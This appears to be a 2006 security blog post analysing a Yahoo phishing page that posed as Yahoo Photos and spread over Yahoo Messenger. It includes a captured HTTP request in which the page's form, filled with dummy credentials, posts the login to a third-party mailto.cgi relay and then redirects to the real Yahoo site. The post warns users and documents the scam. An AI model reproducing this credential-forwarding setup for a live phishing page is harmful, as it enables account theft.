New Yahoo Phishing site

Just after I finished reading a story of a hacker who hacked a lot of .gov.ph sites, my previous shiftmate popped me a message on a Yahoo Messenger. He asked me if we got new IM Worm samples that uses Yahoo Messenger. I told him none, not even a sample from SOBER.AG anniv links, then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend popped him that link. Below is the snapshot of their correspondence in YM:




And below is the screenshot of the Yahoo Phishing site:


Yahoo Phishing Site

Here we are again, reminding Internet users to be cautious on the links that are visiting. As we can see on the image, the site is pretending to be a Yahoo Photo site, but the URL says it is a Geocities link. Always think twice before giving out any username and passwords on a website.


I sniffed the packet, to find out where the Yahoo account credentials will be sent to:

POST /form/mailto.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-
powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache

Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&
Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=
qwerty&passwd=asdf&.save=Sign+InHTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

As we can see, the Yahoo credentials is being sent to
<BLOCKED>.@yahoo.com